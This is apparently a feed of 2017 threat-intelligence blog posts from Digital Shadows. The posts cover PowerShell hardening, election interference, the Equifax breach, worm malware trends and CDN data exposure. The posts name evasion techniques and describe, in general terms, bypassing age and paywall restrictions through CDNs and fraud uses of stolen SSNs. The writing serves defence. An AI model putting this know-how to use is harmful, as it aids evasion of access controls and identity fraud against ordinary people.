    JEA is implemented as a Windows PowerShell session endpoint (it requires PS remoting to be enabled), which includes a PowerShell Session Configuration file and one or more Role Capability files.

    • PowerShell Session Configuration file. This file is used to specify who can connect to an endpoint. Users and security groups can be mapped to specific management roles. Those files are specific to each machine, so an access control per machine is available. They contain information of what will be the name of the JEA endpoint, which roles will be assigned and of course who will have access to this endpoint. These files are PowerShell data files ending in a .pssc extension (
    • Role Capability files. These files are used to specify what actions users in a particular role can perform. For example it can be restricted to use certain pre-selected cmdlets, functions and external programs making the use of custom potentially malicious cdmlets practically impossible. Examples of potentially dangerous commands that should be constrained, are ‘Start-Process’, ‘New-Service’, ‘Invokde-Item’ etc. Detailed information on how to create such files can be found here
    • JEA configuration samples. Examples and templates can be found in Microsoft’s JEA Github repository (

    Finally, another significant benefit of JEA is the actionable logging and reporting which is available in the Windows event log format, since all operations performed through the JEA endpoint can be recorded (with transcripts and logs) and show who accessed the environment and when, and what changes were made.

    6. Scripts Code Signing

    If PowerShell scripts are used in an enterprise environment, code signing is another control that improves security posture, by ensuring authenticity and integrity. This feature, along with a defined Execution Policy or Group Policy as “AllSigned” or “RemoteSigned”, will permit only digitally signed scripts to run. However we have to consider that several attacks in the past used malicious files digitally signed so this control just adds another security layer since it can be bypassed.


    Because PowerShell is being monitored more and more by the day, adversaries have come up with techniques that evade detection, including:

    • Version downgrade to PowerShell v.2
    • Custom use of .NET Framework without PowerShell.exe execution
    • PowerShell obfuscation (invoke-obfuscation)

    These are just indicative techniques; further analysis is not within the scope of this document, however “Logging PowerShell Activity” best practices will detect most of them.


    The most significant recommendation, after reviewing most of the known attack techniques used recently, is upgrading to Windows 10 and PowerShell v.5 with all security features enabled and removing PowerShell v.2 as well. However, this is not easily feasible for most enterprise environments; of equal priority are activating embedded security features and extensive logging focused on specific indicators commonly used for attacking techniques.


    To learn more, subscribe to our threat intelligence emails here.

    Recognition of Hard Work and Relevance – It’s Time to Go Global Wed, 20 Sep 2017 02:43:25 +0000 The news this morning that Digital Shadows has received $26 million in Series C funding from a number of new investors is testament to the hard work the whole team has put into making Digital Shadows successful and relevant for today’s digital economy.

    Before and After Digital Shadows James and Al

     Figure 1: Now and then – a look back at an interview from our early days and our latest company video

    The fact that Octopus Ventures, World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors are excited to invest in this business, which James Chappell and I started 6 years ago, shows that our drive to manage businesses’ digital risk is resonating with organizations of all sizes who continue to need support managing their online exposure, data loss and the increasingly targeted threats by professional cybercriminals and hacktivists.  I am proud that Digital Shadows is able to operate as an extension of our clients’ internal teams, working on these challenges side by side as partners.

    The more we digitize business and government, the more we risk damage to our brand reputation, loss of intellectual property and exposure of sensitive data either through error, by well-meaning insiders and third parties, or malicious threat actors.

    In this digital world we live in, Digital Shadows’ ability to monitor, manage, and remediate digital risk across the widest range of data sources within the open, deep, and dark web is gaining widespread acceptance and week by week we see more of the world best brands signing up to our service.

    This latest investment, which brings our total funding to almost $50million, will enable us to grow internationally, particularly in Asia Pacific and continue our investment in our market leading solution, SearchLight. All our new investors have impressive international pedigrees and complement our existing funders perfectly and we look forward to welcoming Luke Hakes from Octopus Ventures to our Board.

    Over the past six years Digital Shadows has grown and expanded from our original base in the heart of London, to the global stage with more than 140 employees in offices in London, San Francisco and Dallas.

    Digital Shadows Offices

    Figure 2: Images from our San Francisco, Dallas, and London offices 

    It’s a long way from the early days when James and I worked hard to bring our vision to life, and it is heartening to see our goal of enabling enterprises to protect and manage their digital assets and reduce their digital risk being embraced by investors, analysts and, of course, customers around the world. I want to personally thank every member of the Digital Shadows team and all of our clients for their efforts in making the company what it has become today. Here’s to the next six years and what they will bring!

    Bringing Down the Wahl: Three Threats to the German Federal Election Thu, 14 Sep 2017 02:28:14 +0000 Hacking has become the boogie man of political election discourse. In Kenya, the recent presidential election result was forcibly annulled after the opposition alleged voting systems had been hacked. While these claims may be entirely valid, what’s worrying is that no concrete or convincing evidence to prove these allegations has been made public so far. Although not a new phenomenon, ever since the United States presidential election in 2016 the spectre of election interference by hostile nation states, hacktivists or political opponents has embedded itself in the public consciousness, and the fear of vote tampering grows by the day.

    The German federal election takes place on 24 September. Germans vote with pen and paper, and votes are counted by hand, but researchers have allegedly discovered vulnerabilities in the software used to register voting tallies – though it is still unclear whether these tactics can realistically be used to manipulate the election results itself. Germany also has a long tradition of coalition governments. No party has won an outright majority since 1957, and two out of three of Merkel’s governments since 2005 have been Grand Coalitions with her main political opponent, the Social Democratic Party (SPD).  With the German system geared to avoid partisanship, it makes it extremely difficult for an external power to influence the election and get a particular candidate into office.

    Digital Shadows’ analysis of election activity over the past 12 months suggests that we should look beyond the ballot box to the many other ways attackers can leave their mark on the democratic process. While attacks on physical voting systems are rare, attackers often look to capitalise on weaknesses in the broader political apparatus by targeting individual politicians, party networks or local branch offices. Voters may also be targeted by influence campaigns achieved through the spread of false information online. In the upcoming German election, therefore, we should look out for:

    1. Network intrusions and data leakage.

    As seen in both the United States and French presidential elections, attackers will look to release potentially sensitive files in order to discredit a political candidate. Two days before the French election vote in May 2017, an anonymous user posted emails, document and photos intended to embarrass Emmanuel Macron to the 4Chan message board. The ”Macron Leaks” ended up being relatively ineffectual, though this and previous leaks by Guccifer 2.0 in the United States election highlight how data leaks are believed to be an effective tactic for influencing the political process.

    Documents used in data leaks are often obtained through an initial network compromise. In the case of Guccifer 2.0, the leaked files were allegedly attained through a breach of the Democratic National Congress’ servers. German officials fear that sensitive emails stolen from senior lawmakers and politicians by apparent Russian hackers in 2015 could be released to harm Angela Merkel’s campaign. The offices of at least 16 parliamentarians were reportedly compromised in 2015, and in Mar 2017 think tanks aligned to Merkel’s Christian Democratic Union (CDU) were also purportedly targeted by APT-28, an espionage group widely believed to be associated with the Russian intelligence services.

    While allegations of Russian interference are unconfirmed, the fear is that Russia has considerable interest at stake in the outcome of the German election and will conduct network compromises as a means of collecting valuable strategic information. Points of interest include the fraught relationship between Russia, NATO and the EU, as well as the future of the Russo-German economic and commercial relationship – particularly with regards to energy provision – in the wake of the United States Congress’ recent decision to pass increasing international sanctions against Russia due to alleged election interference.

    2. Disinformation campaigns.

    Also known as FAKENEWS, false information intended to mislead audiences can be distributed via a wide variety of different media, including spoof social media accounts and even established online publications. The concern is such that in April 2017 the German cabinet voted on measures that penalize networks that fail to remove defamatory false information, hate speech and other illegal content with a €50m fine.

    German commentators believe most of the disinformation targeting German citizens has focused on immigration policy, which aims to spread xenophobia and undermine Merkel’s previous welcoming of refugees. The German fact-checking website Hoaxmap, for example, was established to identify and refute untrue online claims about refugees:

    Threats to German Elections 2017 2 

    Map taken from Hoaxmap website showing reported instances of false media stories on refugees [Source: Hoaxmap[.]org]

    3. Attacks on local political organizations.

    Attacks against local party branches and regional German parliaments have been reported. The CDU claimed its headquarters in the state of Rhineland-Palatinate experienced “massive attacks” ahead of the presidential debate on 03 September. The parliament network in the state of Saxony-Anhalt was reportedly targeted by a ransomware infection in late August, while the website for the North Rhine-Westphalia state was the victim of a denial of service (DoS) attack by an extortion actor in July. Although the ransomware and DoS were both probably financially motivated and unrelated to the election, attackers may continue to target local party branches believing that their sites and networks are more susceptible to attack.

    Despite the rhetoric warning of Russian election interference, the supposition that Russia would automatically favor Merkel’s opponent is not so clear cut as it might have been in other recent elections. As mentioned above, Germany and Russia currently share a very strong trading relationship, despite political and diplomatic tensions between the two nations. Also, Merkel’s main opponent, Martin Schulz of the Social Democratic Party (SPD), will not necessarily be more amenable to Russian interests than the incumbent. Firstly, Schultz is a staunch European and was President of the European Parliament from 2012 to 2017. Moreover, Schulz has repeatedly publicly rebuked Russia for its foreign policy: in February, Schulz warned against lifting Russian sanctions over its role in the Ukraine crisis, while in October 2016 he criticized the major role Russia had played in the Syrian civil war.

    While the likely motivations and ambitions of hostile nation states remains unclear, organizations can help protect themselves against many of the techniques described above. Mitigation measures include:

    • Providing adequate phishing training for all staff to lessen the risk of network intrusions and public data leakage
    • Properly securing public facing applications
    • Enforcing strong password security practices to reduce the likelihood of account takeovers, particularly on official social media accounts that can be used to spread disinformation
    • Monitoring for fake or spoofed social media profiles, and typosquats designed to impersonate legitimate websites
    • Remain sceptical about reported stats and stories and attempt to verify them across multiple channels

    Influence campaigns, party network intrusions, and fears of vote hacking are now as central to the election process as traditional campaigning and party broadcasts. It is difficult to measure the impact of these types of attacks, but the mere possibility of election interference has served to further damage confidence in politics, particularly in the Western world. It would be naïve to assume that these fears would dissipate any time soon, especially as fears of election interference have a much longer history than the events of the past 12 months. Nevertheless, it is important that we learn to manage these ever-evolving risks and help maintain the elements of our political and electoral systems that we most cherish, while continuing to iron out their many imperfections.

    An Update on the Equifax Data Breach Wed, 13 Sep 2017 02:17:27 +0000

    The credit reporting agency Equifax reported on September 7th, that it had been breached. On Friday, we outlined what we knew at the time, which was replete with intelligence gaps. Five days have gone by and some of these gaps have now been filled in. Here’s what we know so far, and what we can learn from the Equifax breach.

    Equifax Timeline

    Figure 1 – Timeline of events surrounding Equifax breach


    Threat Actor Claims

    There have been at least two claims made by financially-motivated threat actors. One actor had made an extortion attempt and claimed to possess the data, the other offered web shell access to an Equifax server. The credibility of either of the claims was unknown and based on the available evidence the likelihood they were genuine could not be judged.

    1. Extortion attempt

    A Tor hidden service was established around September 8th on which claims were made the owners had compromised the Equifax data and were trying to monetize it. They valued the data at 600 Bitcoin (USD 2.7 million), alleging Equifax executives had amassed USD 3 million in shares by conducting insider trading prior to alerting the public to the breach incident. The operators of the hidden service set a deadline of September 15th for this ransom demand, claiming they would delete the data they possessed if it was paid. If no ransom was paid, the actors said the data would be released publicly. At the time of writing these claims were not confirmed, the site was no longer reachable and the email address had been disabled.

    Equifax Statement on Tor site

    Figure 2 – Statement on Tor hidden service

    On September 11th, an actor using using the same nickname – “pasthole” – claimed on Pastebin that a portion of the data was sold to an unidentified buyer. The actor also said they were responsible for the Tor hidden service previously used to announce an extortion attempt against Equifax. An email address and PGP key provided in the post provided no direct links between the now-offline Tor hidden service and the Pastebin post. None of the claims in this post could be substantiated at the time of writing.

    2. Web shell access offered for sale

    On September 8th, an actor known as “1×0123” claimed to have gained web shell access to an Equifax server, and subsequently offered this access for sale. In their initial post to their Twitter account, 1×0123 posted a screenshot of what appeared to be a listing of Equifax subdomains allegedly being accessed via the Equifax website. In a follow up post, 1×0123 then claimed to offer access to the web shell in exchange for 1 Bitcoin (BTC) and supplied a Jabber ID for contact. Based on 1×0123’s screenshot, it appeared as though they used the WSO web shell, which is a popular tool among certain hacking communities. We did not detect any evidence of authenticity for the alleged web shell access. The screenshot below shows the post made by the actor, who redacted the screenshot.

    Equifax 1x0123 claim

    Figure 3 – Claim made by 1×0123 

    Apache Struts Touted As The Web Application Vulnerability

    In its breach disclosure, Equifax originally stated a web application vulnerability had been exploited which resulted in the data breach. There have been allegations this vulnerability affected Apache Struts reported in the media. This was following publication of an equity research report by Robert W. Baird & Co., which claimed an Equifax representative had told them Apache Struts was exploited to access the compromised information. None of this information could be confirmed at the time of writing.

    Criticisms Leveled Towards Equifax’s Response

    1. Executives sold shares prior to disclosure

    Three Equifax Inc. senior executives were reported to have sold shares collectively worth almost USD 1.8 million shortly after the company discovered the security breach on July 29th. The timing of these sales has led some to question whether the individuals had dumped the shares as a result of the breach. Equifax, however, said the executives had not been informed of the breach incident prior to them selling the shares.

    2. Equifax data breach checker

    Equifax released a service designed to allow individuals to check whether they were implicated in the data breach, but following this there were multiple reports that it was returning incorrect results. A test conducted by the media outlet ZDNet used fake names and social security numbers that returned the result “may have been impacted”. Equifax acknowledged that some consumers who visited the website shortly after it was launched may not have received confirmation they were impacted. It was not known whether the breach checker functioned correctly at the time of writing.

    3. Legal updates

    Following complaints from consumer advocates in relation to Equifax’s terms of service, the company announced that using its TrustID monitoring service would not result in a user forfeiting their right to join a class action law suit against the company in relation to the breach incident.

    On September 8th, The Register also reported two class action lawsuits had been filed against the company, in Portland, Oregon and North Georgia US District Courts. The lawsuits saw Equifax accused of negligence and violations of the U.S. Fair Credit Reporting Act. The complaint filed in Oregon reportedly sought USD 70 billion in damages for residents of that state alone.


    1. At the time of writing, it was not known exactly how many individuals were impacted by this data breach
    2. Despite the claims made by two threat actors, the individual(s) responsible for this breach and their motivations were unknown
    3. Although Equifax stated a web application vulnerability was exploited, the exact vulnerability exploited is not known.


    The breach has had a demonstrably negative impact to Equifax, both in relation to its reputation and its finances. As of September 13th, Equifax stock (EFX) is down $31.16 per share ( since the announcement of the breach. Data breaches frequently increase the amount of scrutiny around a company’s security posture, but the reporting on managers selling their shares, lawsuits and the way Equifax responded to the breach all likely degraded its brand reputation.

    The impact of this data breach to individuals largely depends on the motivation of the actors that gained access to it. For financially motivated actors, the exposed information would almost certainly be of high value as part of fraudulent activity; payment card details can be used to make fraudulent purchases, while personally identifiable information (PII) can be used in identity theft. This kind of data is also frequently offered for sale or traded on criminal locations, showing another potential means of profit. The New York Post published an article on September 8th, which said payment card fraud had “unexpectedly” spiked in August 2017. The article cited the co-founder of a fraud prevention service called Forter, who assessed the spike was likely tied to the Equifax breach. The co-founder, Liron Damri, reportedly claimed a 15 percent increase in fraud attempts was detected in August 2017. At the time of writing, there was insufficient evidence to confirm a link between the Equifax breach and the increased fraud levels.

    While debate continues as to whether this was a “zero day” exploit targeting a previously unknown vulnerability or a lapse in patching which caused the breach, the exact nature of the exploit is largely a side-show. The attack lifecycle describes a number of different stages that an attacker needs to traverse in order to successfully achieve its goals:

    1. Initial Reconnaissance
    2. Initial Compromise
    3. Establish Foothold
    4. Escalate Privileges
    5. Internal Recon
    6. Move Laterally
    7. Maintain presence
    8. Complete Mission

    The successful exploitation of the Apache Struts server merely compromises one of the eight steps, in particular the third one: “Establish Foothold”.

    In order to effectively defend against attackers, an organization must have prevention and detection mechanisms operating at all stages of the attack lifecycle. It cannot be assumed that patching a particular web application framework against security vulnerabilities is sufficient.

    Assuming that attackers are able to penetrate the perimeter of an organization is the “assume breach” model and is an essential part of a mature organization’s approach. In brief, it states that a defender should assume that attackers have already breached their outer defenses and are moving within the organization’s internal network. This corresponds to steps four through eight of the attack lifecycle. A defender can effectively respond to such an intrusion by exercising the principle of least privilege to reduce potential privilege escalation vectors, limiting opportunities for an attack to move laterally within an organization and detecting abnormal behavior, hunt for the introduction of persistence mechanisms and monitor the network for suspiciously large transfers to unknown systems outside of the organization.

    Combining these techniques is called “defense in depth” and allows an organization to be robust against attackers wielding zero day exploits.

    Equifax Breach: The Impact For Enterprises and Consumers Fri, 08 Sep 2017 08:36:49 +0000 What we know about the Equifax breach

    On September 7th, credit reporting agency Equifax announced “a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.” To put this in context, at this time, this incident is almost seven times larger than the Office of Personnel Management breach of 2015. Equifax discovered the unauthorized access on July 29th and determined that the intrusion began in mid-May. Equifax stated that “the information accessed primarily includes names, Social Security Numbers (SSNs), birth dates, addresses and, in some instances, driver’s license numbers. In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.” In addition, the “limited personal information” for Canadian and United Kingdom citizens was all accessed. The initial attack vector was reported as a “web application vulnerability.”

    Equifax Breach 1

    Figure 1. Chairman and Chief Executive Officer, Richard F. Smith discusses the Equifax Breach

    What we don’t know about the Equifax breach

    Whenever doing any sort of analysis, it is important to state what we don’t know. Simply put there is a great deal we don’t know and most of the public will never know (despite what some talking heads might claim). As a former incident responder, I know that investigations aren’t completed in the time it takes to complete an episode of TV drama Scorpion. (Did you know that Scorpion is starting its fourth season?) Equifax stated that the investigation is “substantially complete,” but wisely added that “it remains ongoing and is expected to be completed in the coming weeks.”

    • We don’t actually know how many SSNs were compromised.
    • We don’t know if all 143 million individual’s SSNs were impacted.
    • We don’t know the threat actor responsible for this intrusion. Equifax claimed that “criminals exploited” a web application, but attribution is always a challenge. Structured Analytic Techniques, like the Analysis of Competing Hypothesis we did for WannaCry, can be useful for considering attribution.
    • Speaking of web applications, although we don’t know the specific vulnerability that was exploited, I’d bet 1,000 Gold Dragons it was SQL injection.

    What is most likely to happen next

    There are a wide range of possibilities depending on the goals of the threat actor responsible for the Equifax intrusion. By the way, did I mention that attribution is challenging? Attribution aside, one thing is certain though, regardless of the motivations of the attackers, this data is perfect for social engineering attacks.

    Tax Return Fraud

    SSNs are highly valuable for criminals looking to commit tax refund fraud. Fraudsters use SSNs to file a tax return claiming a fraudulent refund and it can be hard to find out if you’re a victim until it is too late. There is some good advice from the IRS about what to do should you suffer from this form of fraud. You can read more about tax fraud in a blog we wrote earlier this year.

    Opening fraudulent accounts

    There is no shortage of alternative finance companies, such as those who provide short term loans. Fraudsters can successful open accounts in another individual’s name, using a combination of SSNs, fraudulent gas statements and other personally identifiable information (PII). Individuals should be extra vigilant for any evidence of accounts being opened in their name.


    PII is valuable to payment card fraudsters, who require such information to bypass security controls such as “Verified by Visa”, which sometimes ask for digits of cardholders’ SSNs. There are plenty of high-quality cards that criminals use which do not require extra validation, but the lower-level carders must turn to SSNs to enrich lower-quality card dumps. It’s important to remember that SSNs and payment card fraud are inextricably linked.

    Figure 2: An example of a security control for online credit card payments

    Benefits Fraud and Medical care fraud

    Although less glamorous than tax return fraud and carding, benefit and medical care fraud is a real risk. As with tax return fraud, this is hard to detect when it happens, but individuals can be vigilant when checking their Explanation of Benefits statement and flag any unfamiliar activity to their insurance provider.

    Resale of data

    It’s important to note that the individuals responsible for the breach are unlikely to be the same criminals conducting the day-to-day fraud. In the case of the Experian breach, this stolen data soon made its way on the (now defunct) Hansa marketplace. As I’ve previously mentioned; there’s already a market for SSNs to enrich credit card information, so it’s likely that many actors could end up getting a piece of the pie.

    For lower level criminals, the expenses associated with criminal activities will get even lower. SSNs are already cheap; on one AVC (Automated Vending Cart) site (shown in Figure 3), there are over 3.4 million SSNs for sale at only $1. This includes full names, addresses, and – for a large number of accounts – dates of birth. In California alone, there were 334,000 SSNs for sale.

    With tens (and potentially hundreds) of millions more SSNs potentially entering the market, the opportunities for criminals to commit fraud will increase and the price will decrease even more.

     Equifax Breach 3

    Figure 3: A screenshot of an AVC selling Social Security Numbers

    So far, I’ve focused heavily on SSNs – but credit card information was also accessed. However, in the breach. While this number is hundreds of thousands (209,000), it is unlikely to have a significant impact on an already burgeoning black market for card credit information.

    Enablement of nation state campaigns

    Although Equifax claimed this intrusion was conducted by a criminal threat actor, it is possible that this was a nation state actor. (Quick reminder to re-read my note from above “attribution is always a challenge.”) In the event that a nation state actor is responsible for the intrusion, then like the OPM breach, we won’t see the data being monetized in the criminal underground. The stolen data will be leveraged to enable nation states’ campaigns against their intelligence targets.

    Enablement of hacktivist campaigns

    If we are going to consider nation state actors, we should also consider hacktivist threat actors and their activities around the stolen data.  If hacktivists were responsible (I think this is a pretty unlikely scenario, let’s call it #OPunlikely) you could expect to see them use the data to target organizations and individuals that run counter to their world views. Embarrassment and dox’ing, hacktivist go-tos, would come into play.

    What enterprises can learn from the Equifax breach

    1. Incident response takes time and eradication in particular takes time. Equifax said that the intrusion was discovered on July 29th and that they “acted immediately to stop the intrusion.” Equifax’s goal was to contain the adversary that first day, but that true eradication took much longer. It is important that you set expectations with your leadership into how long eradication could actually take.
    2. 3rd party risks raise their ugly head once again. Some aspects of this intrusion remind me of the September 2015 T-Mobile breach. In this intrusion, Experian was hosting T-Mobile data that an unauthorized party accessed and this resulted in the loss of 15 million individual’s records. Any organization with a business to business relationship with Equifax needs to find out the scope of any potential loss of their employee or customer data. This 3rd party exposure also highlights the need for 3rd party risk monitoring.
    3. Crisis communication is key. Effectively communicating during an intrusion is important, it won’t absolve you of your sins, but doing it wrong could make the situation far worse. Understanding when and what to communicate is also important. Equifax discovered the intrusion on July 29th and notified on September 7th. Some might ask why did it take so long for the notification, but I don’t think that a month is that long. The investigation needs to be far enough along so that you can confidently communicate the situation. A CEO that comes out 2 days after a breach and then minimizes what is a much more significant threat will be performing a mea culpa in little time.
    4. GDPR will change the breach notification game. Now let me really trip you up, how would this situation play out if it was after May 25, 2018 and Equifax lost European Union citizen’s data? General Data Protection Regulation changes everything with 72-hour breach notification windows. GDPR states, “This must be done within 72 hours of first having become aware of the breach.” When the fines do come into place, the timing of the communication will have a significant impact.

    What consumers can learn from the Equifax breach

    1. Consider taking advantage of Equifax’s offer. Although the irony is not lost to me, taking advantage of credit file monitoring and identity theft protection offers is important. Check out equifaxsecurity2017[.]com for more. If you don’t want to use Equifax for these services, I get it, look for at alternatives with someone like Transunion or Experian.
    2. Be vigilant about your payment card activity. Use email/SMS alerts to notify of account transactions ($100) over and under ($5) a specific amount. If an unauthorized transaction occurs you can be notified immediately, and can quickly take action. Be vigilant about your card activity and alert your bank about any suspicious activity.
    3. Address tax fraud with IRS Form 14039. If you find out you are a victim of tax return fraud, there are still things you can do. Victims can file and send a IRS Form 14039. Further details are available here.
    4. Check your Explanation of Benefits (EOB) statement. It might look like another piece of spam mail, but it is important to reconcile the EOB statements that your insurance sends you. This your best bet to monitor for medical card fraud. Make sure to report any unfamiliar activity as soon as you observe it.
    5. Assume breach. In the corporate cyber security world, we have learned to “assume breach”. Consumers should also operate under the impression that their confidential data has been compromised.

    Digital Shadows will continue to monitor this situation and provide updates as needed.

    Return of the Worm: A Red Hat Analysis Thu, 07 Sep 2017 01:17:46 +0000 A computer worm is a piece of malware that is designed to replicate itself in order to spread to other machines. While worms have existed since at least the 1980s, they’ve made a surprise comeback in 2017. Notable pieces of malware, including ransomware and banking trojans, have sought to incorporate “wormable” functionalities. Following the WCry attacks, Rick Holland wrote a blog titled “The Early 2000s Called, They Want Their Worms Back”. Could 2017 be seen as the return of the worm? By using the Red Hat structured analytic technique, it’s possible to take the perspective of an attacker and understand the potential evolution of this technique in the near future.

    Worms in 2017

    In early 2017, the SamSam ransomware added self-propagation techniques. The developers of SamSam likely determined that the added technique would increase potential profits for the operators of the ransomware. More recently, Emotet and TrickBot, two banking trojans added self-propagation to their functionality. Banking trojans target customers of online banking services in order to harvest their credentials and access accounts for subsequent fraudulent transfers. Both Emotet and TrickBot demonstrated a new capability that attempted to allow self-propagation through a network using two distinct techniques.

    1. Emotet relied on the brute-force cracking of credentials to spread internally among networked systems, using a list of passwords hard-coded into the malware. This was incorporated in the months after WCry and Petya, demonstrating how criminals track cyber trends and adjust their TTPs accordingly.
    2. The new TrickBot variant attempted to autonomously propagate among networked machines over the Server Message Block (SMB) service. There have been further indications that the exploit used in the TrickBot variant was ETERNALBLUE, an exploit for an SMB vulnerability (CVE-2017-0144). ETERNALBLUE was released by the Shadow Brokers in April 2017 and subsequently used in the WCry (WannaCry) attacks of May 2017.

    Over the past six months, there have been multiple instances of malware using network self-propagation techniques. As seen in Figure 1 below, the Backdoor.Nitol and Gh0st RAT trojans, WCry, and now, possibly, TrickBot have used ETERNALBLUE.

    Wormable Trojans Timeline September 2017 

    Figure 1 – Timeline of malware adding self-propagation

    Red Hat Analysis

    The incorporation of a “worming” capability enables malware to propagate among machines within a local area network, and potentially between networks. This could enable a single successful delivery via a spam email, for example, to infect multiple machines.

    A lack of technical knowledge is one reason why we have seen a lack of adoption in the past. TrickBot is a well-developed and successful banking trojan, indicating that its operators were likely relatively well resourced; however, the newly added self-propagation modules were reportedly relatively poorly written in comparison to its older modules, suggesting a realistic possibility that they may still be under development.

    In order to assess the question of why banking trojan developers would adopt self-propagation techniques, we have conducted a Red Hat analysis exercise. Red Hat analysis is a structured analytic technique that prompts an analyst to change his or her point of reference from that of an analyst observing or predicting an adversary or competitor’s behavior, to someone who must make decisions within an existing operational culture. The technique works best when you are trying to predict the behavior of a specific person or adversary. The Red Hat analysis quadrant in Figure 2 shows the potential advantages, benefits, costs, and risks associated with future development of self-propagating techniques for banking trojans.

     Red Hat Analysis Self Propagation

    Figure 2 – Red Hat analysis of developing self-propagation techniques for banking trojans

    The self propagation outlook

    Actors or groups that can implement these techniques without compromising operational security would likely gain more profit. Given this, it’s likely that the development of self-propagation capabilities will continue in the near future.

    While there’s still limited information on how self-propagation techniques have increased the profitability of Emotet and TrickBot, the incorporation of these capabilities in multiple malware variants showed their developers and operators perceived the techniques as profitable. If development of self-propagation techniques continues, it will likely increase the extent to which a specific variant can impact an enterprise network. However, this would largely depend on how hardened a network is against such activity.

    Shortly after the WCry ransomware worm, we wrote a blog on 5 lessons we can learn from security engineering. The advice in this blog extends beyond the WCry incident, and provides good advice for protecting against the rise of wormable malware, covering these five areas:

      1. Default deny
      2. Least privilege
      3. (Attack) surface reduction
      4. Need to know/compartmentalization
      5. Defense in depth
    Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might be Affected and What You Can Do About It Wed, 06 Sep 2017 16:55:39 +0000 CDN Header Image

    Whether it was the Mirai botnet and Dyn or the “Cloudbleed” revelations, content delivery networks (CDNs) have been in the news recently. Research by Swisscom and Digital Shadows found over 100 million web pages and files exposed on CDNs, with many sensitive pdf, ppt and xls files publicly available online. The risks don’t stop here; if improperly configured, CDNs can be used to bypass age restrictions and registration requirements.

    What is a CDN?

    To start off, let’s level set on what a CDN does. A CDN is a system of distributed servers that deliver webpages and other web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server. This means that users can access content a lot quicker, as well as making them less susceptible to denial of service attacks. Given that over 52% of the Alexa 1,000 websites use a CDN, you might not realize how often you are browsing CDN delivered content.

     CDN Figure 1

    Figure 1: Diagram of a CDN. Source:

    Research Methodology

    To assess the amount of content exposed by CDNs and the subsequent risk:

    1. We first enumerated as many Content Delivery Networks as possible and identified the most deployed CDNs. In total we identified 293 CDNs, many of which can be found here
    2. Searches for these domains were completed across Google, Yandex and Bing to identify the search engine with most coverage. Google was found to have the highest yield, having the most results in over 50 percent of the CDN providers.
    3. Other searches were performed to assess the number of file types and the sensitivity of these documents.
    4. Finally, more manual analysis was applied to understand the implications of the content of these documents.

    Over 100 Million Indexed Pages Leave Organizations Exposed

    In total, searches indicated that there were 103,944,919 indexed web pages and web content across the CDN domains we assessed. Of these, nearly 15 million CDN delivered web pages had pdfs on them. Many of these were benign, but over 22,000 were sensitively marked and not for public distribution.

    Some of the findings were enlightening. There was no shortage of intellectual property across pdfs and ppts, with designs, financial information, plans and pricing models and even reports about nuclear generating stations (Figure 2) all readily available.

     CDN Figure 2

    Figure 2: Nuclear Generating Station

    This could produce a gold mine for competitive intelligence, espionage and phishing. No hacking is necessary – the content is already out there.

    The publicly available spreadsheets (xls and csv files) were worrisome as well. Examples of the types of data discovered included:

    • Sensitively marked patient health testing data
    • A mobile app development competition database with exposed visa numbers, dates of birth, gender and occupation
    • Membership details of clubs with names, home addresses, emails and telephone numbers (See Figure 3)

    CDN Figure 3

    Figure 3: Spreadsheet

    CDNs can be used to bypass of protection mechanisms

    Security mechanisms are put in place so that a website’s content is protected. However, in some instances, CDNs can be used to bypass these restrictions.

    Take YouTube’s age restrictions, for example. Navigating directly to the video itself will force users to log in and verify their age (Figure 4). By searching for the video through a CDN, users can bypass this control on age restriction.

    CDN Figure 4 

    Figure 4: Age restriction on

    CDN Figure 5

    Figure 5: Bypassing YouTube’s age restriction via a CDN

    Secondly, we identified ways to bypass registration requirements for content. An online education platform that charges between $99 and $995 a year. For this fee, users can access a wide range of course materials. Unless they choose to access these resources through the website’s CDN, which would cost the users.

    Why it matters

    It is no surprise that there is sensitive information available through search engines; there are many instances of data exposed through an organization’s supply chain. As demonstrated by the previous examples, the impact of these external digital risks include:

    • Loss of revenue
    • Reputation damage
    • Compliance issues

    Adversaries can reap the rewards of these CDN issues by directing and tailoring their searches to these domains.

    What can be done

    Let us be clear – most files and pages available through CDNs are perfectly benign. However, a subset of this can leave organizations exposed. Considering the upcoming EU GDPR regulations, it is important that organizations understand where their data exists online. The fact that CDNs duplicate this information can pose a risk for organizations. In various cases that we identified it was actually the CDN which is exposing the data without the organization’s consent. There are several things organizations can do to secure their data, identify and mitigate the risks associated with the digital shadows found on CDNs:

    1. Use URL signing and appropriate TTLs on URLs that you share. URL signing allows you to protect your files from unauthorized access with a key. Cdn777 provides good advice
    2. Have a defined document marking system, whether that is through Digital Rights Managements (DRM) are a defined template system in MS Office. This will allow you to more readily identify which documents should or should not be available online;
    3. Ensure that your sensitive information is not being indexed by search engines. Most CDNs will offer guides on how to unindex pages. Hubspot, for example, provides good advice on how to use noIndex and nofollow HTML metatags.
    4. Setup Google Alerts to monitor for the risks associated with CDNs. Understand that it isn’t always you that will be exposed these documents; often it is third parties.
    Bitglass: Compromised Credentials are Just One Way Your Corporate Data is Being Exposed Fri, 18 Aug 2017 19:19:25 +0000 A guest blog from Bitglass, read the original at 

    Every day, employees around the world use the cloud to perform their jobs. With bring your own device (BYOD), workers are given dynamic data access to complete their work from unmanaged devices, remote locations, and unsafe WiFi. Due to the host of modern cloud applications, corporate information can be stored in more places and shared more widely than ever. Together, these trends of BYOD, remote data access, and widespread sharing put enterprise data in jeopardy.

    In its recent study, “Datawatch,” Bitglass explored the ways in which sensitive information can be put at risk by careless employee behavior, and conducted experiments to gain insight into how easily corporate data can leak.

    Unsecured Public WiFi

    Many individuals see free public WiFi as a helpful avenue for internet access and completing work. However, such networks are typically unsecured and can allow mischievous parties to steal login credentials and other sensitive information. To uncover how easily this kind of theft can occur, Bitglass provided free public WiFi at random Bay Area locations to determine how many people would connect and what domains they would visit once online.

    Sharing and Malware

    The degree to which files are shared across cloud applications can expose corporate data. Organizations can be put at risk by malicious and unauthorized users accessing sensitive information. Additionally, if even one employee is infected by malware or ransomware, she or he can spread it throughout the company merely by uploading an infected document to a shared cloud app. To test this, Bitglass, analyzed how widely its customers share their data across multiple cloud applications.

    Compromised Credentials

    In light of the above scenarios, it’s apparent that one set of compromised credentials can lead to excessive data exposure. In its Compromised Credentials report, Digital Shadows, a company that gives deep analytics on digital risk, provides insight and surprising statistics on compromised credentials and the dark web.

